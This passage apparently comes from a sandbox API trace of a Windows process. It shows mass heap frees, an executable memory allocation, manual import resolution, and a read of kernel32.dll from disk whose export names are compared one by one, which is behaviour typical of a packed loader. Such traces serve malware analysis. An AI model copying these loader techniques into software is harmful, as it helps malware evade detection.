1 [0247.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2622bc0 | out: hHeap=0x4a0000) returned 1 [0247.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2640080 | out: hHeap=0x4a0000) returned 1 [0247.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2653290 | out: hHeap=0x4a0000) returned 1 [0247.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x26664a0 | out: hHeap=0x4a0000) returned 1 [0247.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x26796b0 | out: hHeap=0x4a0000) returned 1 [0247.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x268c8c0 | out: hHeap=0x4a0000) returned 1 [0247.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x269fad0 | out: hHeap=0x4a0000) returned 1 [0247.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x26b2ce0 | out: hHeap=0x4a0000) returned 1 [0247.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x26c5ef0 | out: hHeap=0x4a0000) returned 1 [0247.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x26d9100 | out: hHeap=0x4a0000) returned 1 [0247.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x26ec310 | out: hHeap=0x4a0000) returned 1 [0247.682] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x26ff520 | out: hHeap=0x4a0000) returned 1 [0247.683] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2712730 | out: hHeap=0x4a0000) returned 1 [0247.683] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2725940 | out: hHeap=0x4a0000) returned 1 [0247.684] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2738b50 | out: hHeap=0x4a0000) returned 1 [0247.687] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x274bd60 | out: hHeap=0x4a0000) returned 1 [0247.687] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x275ef70 | out: hHeap=0x4a0000) returned 1 [0247.687] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2772180 | out: hHeap=0x4a0000) returned 1 [0247.687] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2785390 | out: hHeap=0x4a0000) returned 1 [0247.687] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x27985a0 | out: hHeap=0x4a0000) returned 1 [0247.687] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x27ab7b0 | out: hHeap=0x4a0000) returned 1 [0247.687] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x27be9c0 | out: hHeap=0x4a0000) returned 1 [0247.687] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x27d1bd0 | out: hHeap=0x4a0000) returned 1 [0247.687] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x27e4de0 | out: hHeap=0x4a0000) returned 1 [0247.687] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x27f7ff0 | out: hHeap=0x4a0000) returned 1 [0247.687] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x280b200 | out: hHeap=0x4a0000) returned 1 [0247.687] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x281e410 | out: hHeap=0x4a0000) returned 1 [0247.687] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2831620 | out: hHeap=0x4a0000) returned 1 [0247.687] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2844830 | out: hHeap=0x4a0000) returned 1 [0247.789] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2857a40 | out: hHeap=0x4a0000) returned 1 [0247.790] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x286ac50 | out: hHeap=0x4a0000) returned 1 [0247.790] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x287de60 | out: hHeap=0x4a0000) returned 1 [0247.790] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2891070 | out: hHeap=0x4a0000) returned 1 [0247.791] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x28a4280 | out: hHeap=0x4a0000) returned 1 [0247.791] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x28b7490 | out: hHeap=0x4a0000) returned 1 [0247.791] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x28ca6a0 | out: hHeap=0x4a0000) returned 1 [0247.791] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x28dd8b0 | out: hHeap=0x4a0000) returned 1 [0247.791] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x28f0ac0 | out: hHeap=0x4a0000) returned 1 [0247.791] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2903cd0 | out: hHeap=0x4a0000) returned 1 [0247.791] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2916ee0 | out: hHeap=0x4a0000) returned 1 [0247.791] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x292a0f0 | out: hHeap=0x4a0000) returned 1 [0247.791] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x293d300 | out: hHeap=0x4a0000) returned 1 [0247.791] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2950510 | out: hHeap=0x4a0000) returned 1 [0247.797] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2963720 | out: hHeap=0x4a0000) returned 1 [0247.797] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2976930 | out: hHeap=0x4a0000) returned 1 [0247.797] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2989b40 | out: hHeap=0x4a0000) returned 1 [0247.797] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x299cd50 | out: hHeap=0x4a0000) returned 1 [0247.799] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x29aff60 | out: hHeap=0x4a0000) returned 1 [0247.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x29c3170 | out: hHeap=0x4a0000) returned 1 [0247.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x29d6380 | out: hHeap=0x4a0000) returned 1 [0247.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x29e9590 | out: hHeap=0x4a0000) returned 1 [0247.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x29fc7a0 | out: hHeap=0x4a0000) returned 1 [0247.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2a0f9b0 | out: hHeap=0x4a0000) returned 1 [0247.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2a22bc0 | out: hHeap=0x4a0000) returned 1 [0247.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2a35dd0 | out: hHeap=0x4a0000) returned 1 [0247.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2a48fe0 | out: hHeap=0x4a0000) returned 1 [0247.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2a5c1f0 | out: hHeap=0x4a0000) returned 1 [0247.805] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2a6f400 | out: hHeap=0x4a0000) returned 1 [0247.805] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2a82610 | out: hHeap=0x4a0000) returned 1 [0247.805] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2a95820 | out: hHeap=0x4a0000) returned 1 [0247.805] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2aa8a30 | out: hHeap=0x4a0000) returned 1 [0247.805] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2abbc40 | out: hHeap=0x4a0000) returned 1 [0247.807] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2acee50 | out: hHeap=0x4a0000) returned 1 [0247.808] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2ae2060 | out: hHeap=0x4a0000) returned 1 [0247.808] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2af5270 | out: hHeap=0x4a0000) returned 1 [0247.808] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2b08480 | out: hHeap=0x4a0000) returned 1 [0247.808] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2b1b690 | out: hHeap=0x4a0000) returned 1 [0247.808] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2b2e8a0 | out: hHeap=0x4a0000) returned 1 [0247.808] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2b41ab0 | out: hHeap=0x4a0000) returned 1 [0247.808] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2b54cc0 | out: hHeap=0x4a0000) returned 1 [0247.808] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2b67ed0 | out: hHeap=0x4a0000) returned 1 [0247.813] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2b7b0e0 | out: hHeap=0x4a0000) returned 1 [0247.813] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2b8e2f0 | out: hHeap=0x4a0000) returned 1 [0247.813] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2ba1500 | out: hHeap=0x4a0000) returned 1 [0247.813] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2bb4710 | out: hHeap=0x4a0000) returned 1 [0247.814] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2bc7920 | out: hHeap=0x4a0000) returned 1 [0247.814] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2bdab30 | out: hHeap=0x4a0000) returned 1 [0247.816] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2bedd40 | out: hHeap=0x4a0000) returned 1 [0247.818] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2c00f50 | out: hHeap=0x4a0000) returned 1 [0247.818] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2c14160 | out: hHeap=0x4a0000) returned 1 [0247.818] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2c27370 | out: hHeap=0x4a0000) returned 1 [0247.818] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2c3a580 | out: hHeap=0x4a0000) returned 1 [0247.818] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2c4d790 | out: hHeap=0x4a0000) returned 1 [0247.818] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2c609a0 | out: hHeap=0x4a0000) returned 1 [0247.818] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2c73bb0 | out: hHeap=0x4a0000) returned 1 [0247.922] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2c86dc0 | out: hHeap=0x4a0000) returned 1 [0247.923] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2c99fd0 | out: hHeap=0x4a0000) returned 1 [0247.923] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2cad1e0 | out: hHeap=0x4a0000) returned 1 [0247.923] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2cc03f0 | out: hHeap=0x4a0000) returned 1 [0247.923] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2cd3600 | out: hHeap=0x4a0000) returned 1 [0247.923] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2ce6810 | out: hHeap=0x4a0000) returned 1 [0247.925] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2cf9a20 | out: hHeap=0x4a0000) returned 1 [0247.926] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d0cc30 | out: hHeap=0x4a0000) returned 1 [0247.926] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d1fe40 | out: hHeap=0x4a0000) returned 1 [0247.926] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d33050 | out: hHeap=0x4a0000) returned 1 [0247.926] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d46260 | out: hHeap=0x4a0000) returned 1 [0247.926] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d59470 | out: hHeap=0x4a0000) returned 1 [0247.927] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d6c680 | out: hHeap=0x4a0000) returned 1 [0247.927] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d7f890 | out: hHeap=0x4a0000) returned 1 [0247.931] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d92aa0 | out: hHeap=0x4a0000) returned 1 [0247.931] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2da5cb0 | out: hHeap=0x4a0000) returned 1 [0247.931] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2db8ec0 | out: hHeap=0x4a0000) returned 1 [0247.931] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2dcc0d0 | out: hHeap=0x4a0000) returned 1 [0247.931] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2ddf2e0 | out: hHeap=0x4a0000) returned 1 [0247.933] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2df24f0 | out: hHeap=0x4a0000) returned 1 [0247.935] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2e05700 | out: hHeap=0x4a0000) returned 1 [0247.935] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2e18910 | out: hHeap=0x4a0000) returned 1 [0247.935] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2e40080 | out: hHeap=0x4a0000) returned 1 [0247.935] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2e53290 | out: hHeap=0x4a0000) returned 1 [0247.935] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2e664a0 | out: hHeap=0x4a0000) returned 1 [0247.935] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2e796b0 | out: hHeap=0x4a0000) returned 1 [0247.935] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2e8c8c0 | out: hHeap=0x4a0000) returned 1 [0247.935] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2e9fad0 | out: hHeap=0x4a0000) returned 1 [0247.935] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2eb2ce0 | out: hHeap=0x4a0000) returned 1 [0247.935] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2ec5ef0 | out: hHeap=0x4a0000) returned 1 [0247.935] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2ed9100 | out: hHeap=0x4a0000) returned 1 [0247.941] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2eec310 | out: hHeap=0x4a0000) returned 1 [0247.943] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2eff520 | out: hHeap=0x4a0000) returned 1 [0247.943] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2f12730 | out: hHeap=0x4a0000) returned 1 [0247.943] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2f25940 | out: hHeap=0x4a0000) returned 1 [0247.943] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2f38b50 | out: hHeap=0x4a0000) returned 1 [0247.946] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2f4bd60 | out: hHeap=0x4a0000) returned 1 [0247.946] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2f5ef70 | out: hHeap=0x4a0000) returned 1 [0247.946] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2f72180 | out: hHeap=0x4a0000) returned 1 [0247.946] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2f85390 | out: hHeap=0x4a0000) returned 1 [0247.946] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2f985a0 | out: hHeap=0x4a0000) returned 1 [0247.946] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2fab7b0 | out: hHeap=0x4a0000) returned 1 [0247.949] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2fbe9c0 | out: hHeap=0x4a0000) returned 1 [0247.950] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2fd1bd0 | out: hHeap=0x4a0000) returned 1 [0247.950] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2fe4de0 | out: hHeap=0x4a0000) returned 1 [0247.950] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2ff7ff0 | out: hHeap=0x4a0000) returned 1 [0247.950] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x300b200 | out: hHeap=0x4a0000) returned 1 [0247.950] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x301e410 | out: hHeap=0x4a0000) returned 1 [0247.950] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x3031620 | out: hHeap=0x4a0000) returned 1 [0247.950] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x3044830 | out: hHeap=0x4a0000) returned 1 [0247.954] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x3057a40 | out: hHeap=0x4a0000) returned 1 [0247.954] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x306ac50 | out: hHeap=0x4a0000) returned 1 [0247.955] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x307de60 | out: hHeap=0x4a0000) returned 1 [0247.955] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x3091070 | out: hHeap=0x4a0000) returned 1 [0247.955] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x30a4280 | out: hHeap=0x4a0000) returned 1 [0247.955] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x30b7490 | out: hHeap=0x4a0000) returned 1 [0247.955] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x30ca6a0 | out: hHeap=0x4a0000) returned 1 [0247.956] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x30dd8b0 | out: hHeap=0x4a0000) returned 1 [0247.956] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x30f0ac0 | out: hHeap=0x4a0000) returned 1 [0247.956] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x3103cd0 | out: hHeap=0x4a0000) returned 1 [0247.956] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x3116ee0 | out: hHeap=0x4a0000) returned 1 [0247.956] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x312a0f0 | out: hHeap=0x4a0000) returned 1 [0248.071] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x313d300 | out: hHeap=0x4a0000) returned 1 [0248.073] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x3150510 | out: hHeap=0x4a0000) returned 1 [0248.076] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x3163720 | out: hHeap=0x4a0000) returned 1 [0248.793] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0248.799] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0248.800] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0248.800] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0248.801] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0248.801] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0248.801] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0248.801] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0248.801] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0248.802] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0248.802] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0248.802] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0248.802] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0248.802] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0248.802] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0248.802] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0248.803] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0248.803] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0248.803] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0248.803] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0248.803] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0248.803] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0248.803] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0248.803] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0248.804] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0248.804] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0248.804] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0248.804] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cdb40 | out: hHeap=0x4a0000) returned 1 [0248.805] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0248.810] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b0a90 | out: hHeap=0x4a0000) returned 1 [0248.812] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0248.812] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0248.813] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0248.813] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0248.813] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0248.813] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0248.815] GetProcessHeap () returned 0x4a0000 [0248.815] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x68) returned 0x4a8d40 [0248.816] GetProcessHeap () returned 0x4a0000 [0248.816] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9120 [0248.818] GetProcessHeap () returned 0x4a0000 [0248.818] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x48) returned 0x4afff0 [0248.818] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0248.818] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0248.818] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0248.818] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0248.818] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0248.819] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0248.819] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0248.819] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0248.819] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0248.819] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0248.819] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0248.819] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0251.559] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0251.560] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0251.560] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0251.560] GetProcessHeap () returned 0x4a0000 [0251.560] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xac430) returned 0x4cc5f0 [0251.563] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0251.563] ReadFile (in: hFile=0x134, lpBuffer=0x4cc5f0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4cc5f0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0251.580] CloseHandle (hObject=0x134) returned 1 [0251.580] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0251.597] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0251.597] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0251.597] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0251.597] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0251.597] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0251.597] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0251.597] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0251.597] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0251.597] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0251.597] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0251.597] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0251.597] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0251.597] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0251.597] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0251.597] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0251.597] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0251.597] lstrcmpA 